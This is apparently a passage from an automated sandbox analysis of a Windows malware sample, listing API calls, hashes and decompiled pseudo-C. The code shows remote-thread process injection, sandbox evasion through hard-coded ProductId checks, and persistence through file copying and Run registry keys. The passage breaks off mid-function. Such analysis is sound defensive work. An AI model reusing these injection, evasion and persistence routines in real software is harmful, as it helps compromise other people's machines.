                                    0x00401337
                                    0x0040133c
                                    0x0040133e
                                    0x00401340
                                    0x00401395
                                    0x00401395
                                    0x00401399
                                    0x00000000
                                    0x00000000
                                    0x00401346
                                    0x00401381
                                    0x00401388
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040138a
                                    0x0040138a
                                    0x0040138c
                                    0x0040138f
                                    0x00401390
                                    0x00401391
                                    0x00000000
                                    0x0040138a
                                    0x0040134e
                                    0x00401367
                                    0x00401367
                                    0x0040136b
                                    0x00000000
                                    0x00000000
                                    0x00401353
                                    0x0040135a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040135c
                                    0x0040135c
                                    0x0040135e
                                    0x00401361
                                    0x00401362
                                    0x00401363
                                    0x0040135c
                                    0x00401374
                                    0x0040137c
                                    0x0040137c
                                    0x00401374
                                    0x004013a1
                                    0x004012df
                                    0x004012df
                                    0x00000000
                                    0x004012df
                                    0x004012d7

                                    APIs
                                    • CharNextA.USER32(00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 004012EF
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 004012F9
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401316
                                    • CharNextA.USER32(00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401320
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401349
                                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401353
                                    • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401377
                                    • CharNextA.USER32(00000000,00000000,?,00000000,00000001,?,004013EA,?,?,?,00406A79,00000000,00406ABE), ref: 00401381
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CharNext
                                    • String ID: "$"
                                    • API String ID: 3213498283-3758156766
                                    • Opcode ID: 69bc44e6375b114957132a77422f8722e1c84a2160c11b934303181ded4122b0
                                    • Instruction ID: 10f63cc1fa669f131e3f68441fcaf6b27babd9536db3b85d99238111a4137022
                                    • Opcode Fuzzy Hash: 69bc44e6375b114957132a77422f8722e1c84a2160c11b934303181ded4122b0
                                    • Instruction Fuzzy Hash: AE21C8446043C059EF316ABA08C07A667C54A1B308B5844BBDAC1FBBF7D47D4887C22E
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00403954, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 53libraryloaderCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E00403954(void* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				_Unknown_base(*)()* _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _t20;
				void* _t22;
				void* _t30;
				intOrPtr _t37;
				void* _t40;
				void* _t43;

				_t30 = __ecx;
				_push(__ebx);
				_push(__esi);
				_v8 = __edx;
				_t40 = __eax;
				E00401F38(_v8);
				_push(_t43);
				_push(0x4039f2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t43 + 0xfffffff0;
				_v12 = GetProcAddress(GetModuleHandleA("kernel32"), "Sleep");
				_v20 = GetProcAddress(GetModuleHandleA("kernel32"), "LoadLibraryA");
				_t20 = E004037EC(_t40, 0, _t30, E00401F48(_v8), __edi, _t40); // executed
				_v16 = _t20;
				_t22 = E004038AC(_t40,  &_v20, E00403920, 0, 0xc); // executed
				if(_t22 != 0) {
					CloseHandle(_t22);
				}
				_pop(_t37);
				 *[fs:eax] = _t37;
				_push(E004039F9);
				return E00401AC0( &_v8);
			}













                                    0x00403954
                                    0x0040395a
                                    0x0040395b
                                    0x0040395c
                                    0x0040395f
                                    0x00403964
                                    0x0040396b
                                    0x0040396c
                                    0x00403971
                                    0x00403974
                                    0x0040398e
                                    0x004039a6
                                    0x004039b5
                                    0x004039ba
                                    0x004039cb
                                    0x004039d2
                                    0x004039d5
                                    0x004039da
                                    0x004039de
                                    0x004039e1
                                    0x004039e4
                                    0x004039f1

                                    APIs
                                    • GetModuleHandleA.KERNEL32(kernel32,Sleep,00000000,004039F2), ref: 00403983
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 00403989
                                    • GetModuleHandleA.KERNEL32(kernel32,LoadLibraryA,Sleep,00000000,004039F2), ref: 0040399B
                                    • GetProcAddress.KERNEL32(00000000,kernel32), ref: 004039A1
                                      • Part of subcall function 004037EC: VirtualAllocEx.KERNEL32(?,00000000,00000001,00003000,00000040,00000000,0040386A,?,?,?,?,00000000,00000000,00000000), ref: 00403828
                                      • Part of subcall function 004037EC: WriteProcessMemory.KERNEL32(?,00000000,?,00000001,?,?,00000000,00000001,00003000,00000040,00000000,0040386A), ref: 0040384A
                                      • Part of subcall function 004038AC: CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004038EA
                                      • Part of subcall function 004038AC: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004038FA
                                      • Part of subcall function 004038AC: ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,00000000,000000FF), ref: 0040390D
                                    • CloseHandle.KERNEL32(00000000,00000000,kernel32,LoadLibraryA,Sleep,00000000,004039F2), ref: 004039D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Handle$AddressMemoryModuleProcProcess$AllocCloseCreateObjectReadRemoteSingleThreadVirtualWaitWrite
                                    • String ID: LoadLibraryA$Sleep$kernel32
                                    • API String ID: 3487503967-1813742806
                                    • Opcode ID: f87daed2c883fae0bc52b1811faf6daf2e3c45671e56467328cf1f20e444393c
                                    • Instruction ID: 3dd456deda738439a9530638aaf5270c0b396e353cabac5e26cfdff56c824f73
                                    • Opcode Fuzzy Hash: f87daed2c883fae0bc52b1811faf6daf2e3c45671e56467328cf1f20e444393c
                                    • Instruction Fuzzy Hash: 01012DB0B40605BED701EFA68C03A5E7EAC9B44716B60497BB400F72D1DB7C9F009A58
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004053EC, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004053EC() {
				char _v264;
				int _v268;
				void* _v272;
				long _t6;
				int _t15;

				_t15 = 0;
				_t6 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268); // executed
				if(_t6 == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268); // executed
					if( &_v264 == "76487-644-3177037-23510") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272);
				return _t15;
			}








                                    0x004053f3
                                    0x00405404
                                    0x0040540b
                                    0x0040540d
                                    0x0040542d
                                    0x0040543b
                                    0x0040543d
                                    0x0040543d
                                    0x0040543b
                                    0x00405443
                                    0x00405451

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405404
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000), ref: 0040542D
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1C4,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 00405443
                                    Strings
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 004053FA
                                    • ProductId, xrefs: 00405423
                                    • 76487-644-3177037-23510, xrefs: 00405436
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 76487-644-3177037-23510$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-300012159
                                    • Opcode ID: 54b8dddc72f5521d94e0edf2fcf669d6ba73802ff5b9393f4314c7fe48c2e6b5
                                    • Instruction ID: 4dbc9aba648d7bbbf83a3552de5bfbcba9719c904d90c9cb7132e047c1fadaca
                                    • Opcode Fuzzy Hash: 54b8dddc72f5521d94e0edf2fcf669d6ba73802ff5b9393f4314c7fe48c2e6b5
                                    • Instruction Fuzzy Hash: 30F08C706403007AE610EA90CC82FDB778CDB40715F50483AFA84FA1D1D6BDE9889A6A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004054A4, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E004054A4() {
				char _v264;
				int _v268;
				void* _v272;
				long _t6;
				int _t15;

				_t15 = 0;
				_t6 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268); // executed
				if(_t6 == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268); // executed
					if( &_v264 == "76487-337-8429955-22614") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272); // executed
				return _t15;
			}








                                    0x004054ab
                                    0x004054bc
                                    0x004054c3
                                    0x004054c5
                                    0x004054e5
                                    0x004054f3
                                    0x004054f5
                                    0x004054f5
                                    0x004054f3
                                    0x004054fb
                                    0x00405509

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 004054BC
                                    • RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000), ref: 004054E5
                                    • RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001,?,00000000,0040B1AA,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4), ref: 004054FB
                                    Strings
                                    • ProductId, xrefs: 004054DB
                                    • Software\Microsoft\Windows\CurrentVersion, xrefs: 004054B2
                                    • 76487-337-8429955-22614, xrefs: 004054EE
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: 76487-337-8429955-22614$ProductId$Software\Microsoft\Windows\CurrentVersion
                                    • API String ID: 3677997916-3593519172
                                    • Opcode ID: 2750bd466e02aa405076e09ed9390e2a88f793c938554653eb2e146c9d186da2
                                    • Instruction ID: 47032f9d578e649e4c59a246db62157aaca0609ee869790ecbc754fa5fe81585
                                    • Opcode Fuzzy Hash: 2750bd466e02aa405076e09ed9390e2a88f793c938554653eb2e146c9d186da2
                                    • Instruction Fuzzy Hash: A6F0A7703403007AD610DA94CC82F9B778CDB41714F50443AF944FA1C0D3BDE9489F2A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00406B54, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 380fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 81%
                                    			E00406B54(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				intOrPtr* _t106;
				intOrPtr* _t107;
				intOrPtr* _t108;
				intOrPtr* _t109;
				intOrPtr* _t110;
				void* _t112;
				void* _t126;
				intOrPtr* _t143;
				void* _t154;
				void* _t166;
				CHAR* _t169;
				int _t172;
				int _t186;
				intOrPtr* _t190;
				intOrPtr* _t191;
				intOrPtr* _t192;
				intOrPtr* _t193;
				intOrPtr* _t198;
				void* _t200;
				void* _t201;
				intOrPtr* _t204;
				intOrPtr* _t218;
				intOrPtr* _t226;
				intOrPtr* _t240;
				intOrPtr* _t248;
				intOrPtr* _t258;
				intOrPtr* _t272;
				intOrPtr* _t284;
				intOrPtr _t301;
				intOrPtr* _t313;
				void* _t314;
				intOrPtr* _t315;
				intOrPtr* _t317;
				void* _t321;
				intOrPtr* _t332;
				intOrPtr _t333;
				intOrPtr* _t334;
				intOrPtr* _t338;
				char _t340;
				intOrPtr _t351;
				CHAR* _t392;
				CHAR* _t394;
				intOrPtr _t396;
				intOrPtr _t397;
				void* _t402;

				_t393 = __esi;
				_t391 = __edi;
				_t396 = _t397;
				_t314 = 0xf;
				do {
					_push(0);
					_push(0);
					_t314 = _t314 - 1;
				} while (_t314 != 0);
				_push(_t314);
				_push(__esi);
				_push(__edi);
				_t313 = __edx;
				_v8 = __eax;
				E00401F38(_v8);
				_push(_t396);
				_push(0x407061);
				_push( *[fs:eax]);
				 *[fs:eax] = _t397;
				E00401B14(_t313, _v8);
				_t106 =  *0x40d1f0; // 0x40e890
				_t399 =  *_t106;
				if( *_t106 != 0) {
					_t107 =  *0x40d1f0; // 0x40e890
					__eflags =  *_t107 - 1;
					if(__eflags != 0) {
						_t108 =  *0x40d1f0; // 0x40e890
						__eflags =  *_t108 - 2;
						if(__eflags != 0) {
							_t109 =  *0x40d1f0; // 0x40e890
							__eflags =  *_t109 - 3;
							if(__eflags != 0) {
								_t110 =  *0x40d218; // 0x40e894
								_t112 = E00401D50( *_t110);
								_t332 =  *0x40d218; // 0x40e894
								_t333 =  *_t332;
								__eflags =  *((char*)(_t333 + _t112 - 1)) - 0x5c;
								if( *((char*)(_t333 + _t112 - 1)) != 0x5c) {
									_t301 =  *0x40d218; // 0x40e894
									E00401D58(_t301, 0x407078);
								}
								_t334 =  *0x40d218; // 0x40e894
								E00401B58( &_v12,  *_t334);
								E00401CAC( &_v28, E00401F48(_v12));
								E00406684(_v28, _t313, __eflags);
							} else {
								E004061DC( &_v12, _t313, __esi, __eflags);
							}
						} else {
							E00406034( &_v12, _t313, __eflags);
						}
					} else {
						E00405F7C( &_v12, _t313, __eflags);
					}
				} else {
					E00405EF0( &_v12, _t313, _t399);
				}
				if( *((char*)(_v12 + E00401D50(_v12) - 1)) != 0x5c) {
					E00401D58( &_v12, 0x407078);
				}
				_t338 =  *0x40d208; // 0x40e898
				E00401D58( &_v12,  *_t338);
				_t126 = E00401D50(_v12);
				_t340 = _v12;
				_t401 =  *((char*)(_t340 + _t126 - 1)) - 0x5c;
				if( *((char*)(_t340 + _t126 - 1)) != 0x5c) {
					E00401D58( &_v12, 0x407078);
				}
				_t315 =  *0x40d20c; // 0x40e89c
				E00401D9C( &_v16,  *_t315, _v12);
				E00401CAC( &_v32, E00401F48(_v12));
				E00406684(_v32, _t313, _t401); // executed
				E00401CAC( &_v36, E00401F48(_v16));
				E00405A28(_v36, _t313, _t391, _t393, _t401); // executed
				E00405BEC( &_v40, _t313, _t393, _t401); // executed
				_push(_v40);
				_push(0x407078);
				_t143 =  *0x40d208; // 0x40e898
				_push( *_t143);
				E00401E10();
				_t402 =  *((char*)(_v20 + E00401D50(_v20) - 1)) - 0x5c;
				if(_t402 != 0) {
					E00401D58( &_v20, 0x407078);
				}
				_t317 =  *0x40d20c; // 0x40e89c
				E00401D9C( &_v24,  *_t317, _v20);
				E00404740(_v16, _t313,  &_v44, _t391, _t393, _t402);
				_push(_v44);
				E00404740(_v8, _t313,  &_v48, _t391, _t393, _t402);
				_pop(_t154);
				E00401E94(_t154, _v48);
				if(_t402 == 0) {
					L21:
					E00401B14(_t313, _v8);
					goto L40;
				} else {
					E00404740(_v24, _t313,  &_v52, _t391, _t393, _t402);
					_push(_v52);
					E00404740(_v8, _t313,  &_v56, _t391, _t393, _t402);
					_pop(_t166);
					E00401E94(_t166, _v56);
					if(_t402 != 0) {
						_t169 = E00401F48(_v16);
						_t394 = E00401F48(_v8);
						_t172 = CopyFileA(_t394, _t169, 0); // executed
						__eflags = _t172 - 1;
						asm("sbb eax, eax");
						__eflags = _t172 + 1 - 1;
						if(_t172 + 1 != 1) {
							E00401CAC( &_v60, E00401F48(_v20));
							E00406684(_v60, _t313, __eflags);
							_t392 = E00401F48(_v24);
							E00401CAC( &_v64, _t392);
							E00405A28(_v64, _t313, _t392, _t394, __eflags);
							_t186 = CopyFileA(_t394, _t392, 0);
							__eflags = _t186 - 1;
							asm("sbb eax, eax");
							__eflags = _t186 + 1 - 1;
							if(_t186 + 1 != 1) {
								E00401B14(_t313, _v8);
							} else {
								E00401B14(_t313, _v24);
							}
						} else {
							E00401B14(_t313, _v16);
						}
						_t190 =  *0x40d1ec; // 0x40e8ac
						__eflags =  *_t190;
						if( *_t190 != 0) {
							_t248 =  *0x40d1ec; // 0x40e8ac
							E00401CAC( &_v72, E00401F48( *_t248));
							E00406088(0x80000002, _t313, _v72, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags,  &_v68, 0); // executed
							E00401E94(_v68,  *_t313);
							if(__eflags != 0) {
								E00401CAC( &_v76, E00401F48( *_t313));
								_t284 =  *0x40d1ec; // 0x40e8ac
								E00401CAC( &_v80, E00401F48( *_t284));
								E00405C4C(0x80000002, _t313, _v80, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags, _v76); // executed
							}
							_t258 =  *0x40d1ec; // 0x40e8ac
							E00401CAC( &_v88, E00401F48( *_t258));
							E00406088(0x80000001, _t313, _v88, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags,  &_v84, 0); // executed
							E00401E94(_v84,  *_t313);
							if(__eflags != 0) {
								E00401CAC( &_v92, E00401F48( *_t313));
								_t272 =  *0x40d1ec; // 0x40e8ac
								E00401CAC( &_v96, E00401F48( *_t272));
								E00405C4C(0x80000001, _t313, _v96, "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run", _t394, __eflags, _v92);
							}
						}
						_t191 =  *0x40d1d8; // 0x40e8a4
						__eflags =  *_t191;
						if( *_t191 != 0) {
							_t226 =  *0x40d1d8; // 0x40e8a4
							E00401CAC( &_v104, E00401F48( *_t226));
							E00406088(0x80000002, _t313, _v104, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags,  &_v100, 0); // executed
							E00401E94(_v100,  *_t313);
							if(__eflags != 0) {
								E00401CAC( &_v108, E00401F48( *_t313));
								_t240 =  *0x40d1d8; // 0x40e8a4
								E00401CAC( &_v112, E00401F48( *_t240));
								E00405C4C(0x80000002, _t313, _v112, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags, _v108);
							}
						}
						_t192 =  *0x40d1e0; // 0x40e8a8
						__eflags =  *_t192;
						if( *_t192 != 0) {
							_t204 =  *0x40d1e0; // 0x40e8a8
							E00401CAC( &_v120, E00401F48( *_t204));
							E00406088(0x80000001, _t313, _v120, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags,  &_v116, 0); // executed
							E00401E94(_v116,  *_t313);
							if(__eflags != 0) {
								E00401CAC( &_v124, E00401F48( *_t313));
								_t218 =  *0x40d1e0; // 0x40e8a8
								E00401CAC( &_v128, E00401F48( *_t218));
								E00405C4C(0x80000001, _t313, _v128, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", _t394, __eflags, _v124);
							}
						}
						_t193 =  *0x40d1e4; // 0x40e8a0
						__eflags =  *_t193;
						if( *_t193 != 0) {
							_push(0x4070fc);
							_push(E00406840(1));
							_push(E00401F48( *_t313));
							_t198 =  *0x40d1e4; // 0x40e8a0
							_t200 = E00401F48( *_t198);
							_pop(_t321);
							_pop(_t201); // executed
							E00406ADC(_t201, _t321, _t200, __eflags); // executed
						}
						L40:
						_pop(_t351);
						 *[fs:eax] = _t351;
						_push(E00407068);
						return E00401AE4( &_v128, 0x1f);
					}
					goto L21;
				}
			}















































































                                    0x00406b54
                                    0x00406b54
                                    0x00406b55
                                    0x00406b57
                                    0x00406b5c
                                    0x00406b5c
                                    0x00406b5e
                                    0x00406b60
                                    0x00406b60
                                    0x00406b63
                                    0x00406b65
                                    0x00406b66
                                    0x00406b67
                                    0x00406b69
                                    0x00406b6f
                                    0x00406b76
                                    0x00406b77
                                    0x00406b7c
                                    0x00406b7f
                                    0x00406b87
                                    0x00406b8c
                                    0x00406b91
                                    0x00406b94
                                    0x00406ba3
                                    0x00406ba8
                                    0x00406bab
                                    0x00406bba
                                    0x00406bbf
                                    0x00406bc2
                                    0x00406bce
                                    0x00406bd3
                                    0x00406bd6
                                    0x00406be2
                                    0x00406be9
                                    0x00406bee
                                    0x00406bf4
                                    0x00406bf6
                                    0x00406bfb
                                    0x00406bfd
                                    0x00406c07
                                    0x00406c0c
                                    0x00406c14
                                    0x00406c1c
                                    0x00406c2e
                                    0x00406c36
                                    0x00406bd8
                                    0x00406bdb
                                    0x00406bdb
                                    0x00406bc4
                                    0x00406bc7
                                    0x00406bc7
                                    0x00406bad
                                    0x00406bb0
                                    0x00406bb0
                                    0x00406b96
                                    0x00406b99
                                    0x00406b99
                                    0x00406c4b
                                    0x00406c55
                                    0x00406c55
                                    0x00406c5d
                                    0x00406c65
                                    0x00406c6d
                                    0x00406c72
                                    0x00406c75
                                    0x00406c7a
                                    0x00406c84
                                    0x00406c84
                                    0x00406c89
                                    0x00406c97
                                    0x00406ca9
                                    0x00406cb1
                                    0x00406cc3
                                    0x00406ccb
                                    0x00406cd3
                                    0x00406cd8
                                    0x00406cdb
                                    0x00406ce0
                                    0x00406ce5
                                    0x00406cef
                                    0x00406cff
                                    0x00406d04
                                    0x00406d0e
                                    0x00406d0e
                                    0x00406d13
                                    0x00406d21
                                    0x00406d2c
                                    0x00406d34
                                    0x00406d3b
                                    0x00406d43
                                    0x00406d44
                                    0x00406d49
                                    0x00406d70
                                    0x00406d75
                                    0x00000000
                                    0x00406d4b
                                    0x00406d51
                                    0x00406d59
                                    0x00406d60
                                    0x00406d68
                                    0x00406d69
                                    0x00406d6e
                                    0x00406d84
                                    0x00406d92
                                    0x00406d95
                                    0x00406d9a
                                    0x00406d9d
                                    0x00406da0
                                    0x00406da2
                                    0x00406dbd
                                    0x00406dc5
                                    0x00406dd2
                                    0x00406dd9
                                    0x00406de1
                                    0x00406dea
                                    0x00406def
                                    0x00406df2
                                    0x00406df5
                                    0x00406df7
                                    0x00406e0a
                                    0x00406df9
                                    0x00406dfe
                                    0x00406dfe
                                    0x00406da4
                                    0x00406da9
                                    0x00406da9
                                    0x00406e0f
                                    0x00406e14
                                    0x00406e17
                                    0x00406e23
                                    0x00406e34
                                    0x00406e46
                                    0x00406e50
                                    0x00406e55
                                    0x00406e63
                                    0x00406e6c
                                    0x00406e7d
                                    0x00406e8f
                                    0x00406e8f
                                    0x00406e9a
                                    0x00406eab
                                    0x00406ebd
                                    0x00406ec7
                                    0x00406ecc
                                    0x00406eda
                                    0x00406ee3
                                    0x00406ef4
                                    0x00406f06
                                    0x00406f06
                                    0x00406ecc
                                    0x00406f0b
                                    0x00406f10
                                    0x00406f13
                                    0x00406f1b
                                    0x00406f2c
                                    0x00406f3e
                                    0x00406f48
                                    0x00406f4d
                                    0x00406f5b
                                    0x00406f64
                                    0x00406f75
                                    0x00406f87
                                    0x00406f87
                                    0x00406f4d
                                    0x00406f8c
                                    0x00406f91
                                    0x00406f94
                                    0x00406f9c
                                    0x00406fad
                                    0x00406fbf
                                    0x00406fc9
                                    0x00406fce
                                    0x00406fdc
                                    0x00406fe5
                                    0x00406ff6
                                    0x00407008
                                    0x00407008
                                    0x00406fce
                                    0x0040700d
                                    0x00407012
                                    0x00407015
                                    0x00407017
                                    0x00407028
                                    0x00407030
                                    0x00407031
                                    0x00407038
                                    0x0040703f
                                    0x00407040
                                    0x00407041
                                    0x00407041
                                    0x00407046
                                    0x00407048
                                    0x0040704b
                                    0x0040704e
                                    0x00407060
                                    0x00407060
                                    0x00000000
                                    0x00406d6e

                                    APIs
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406D95
                                    • CopyFileA.KERNEL32(00000000,00000000,00000000), ref: 00406DEA
                                      • Part of subcall function 00406088: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 004060DD
                                      • Part of subcall function 00406088: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 00406101
                                      • Part of subcall function 00406088: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00000000,?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001), ref: 0040612B
                                      • Part of subcall function 00406088: RegCloseKey.ADVAPI32(?,?,00000000,00000000,?,00000000,?,80000001,00000000,00000000,00000001,?,00000000,00406167), ref: 0040613F
                                      • Part of subcall function 00405C4C: RegCreateKeyA.ADVAPI32(?,00000000,?), ref: 00405C92
                                      • Part of subcall function 00405C4C: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000002,00000000,00000000,00000000,00405CF1), ref: 00405CBA
                                      • Part of subcall function 00405C4C: RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000002,00000000,00000000,00000000,00405CF1), ref: 00405CC9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.529535724.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000001.00000002.529521223.0000000000400000.00000002.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529562470.0000000000410000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529573444.0000000000414000.00000040.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529623467.0000000000451000.00000080.00020000.sdmp Download File
                                    • Associated: 00000001.00000002.529635433.0000000000456000.00000004.00020000.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Value$CloseCopyFileQuery$CreateOpen
                                    • String ID: 4h@$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run$Software\Microsoft\Windows\CurrentVersion\Run
                                    • API String ID: 1469814539-1189044031
                                    • Opcode ID: 1733ce09272f468f8cee265a2a4fb179a50cdf102672fd97dcfc76b335fe8140
                                    • Instruction ID: 0337d0d0e41828abccd6a10b42b8af73d9b7eafca3f8209fdc2fdaca8a3f3fd1
                                    • Opcode Fuzzy Hash: 1733ce09272f468f8cee265a2a4fb179a50cdf102672fd97dcfc76b335fe8140
                                    • Instruction Fuzzy Hash: 13E1FC34A041099FDB11EBA9C881A9EB3B5AF45308F60417BF405BB2F6DB38AD45CB59
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004068B4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74registryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 51%
                                    			E004068B4(void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
				void* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
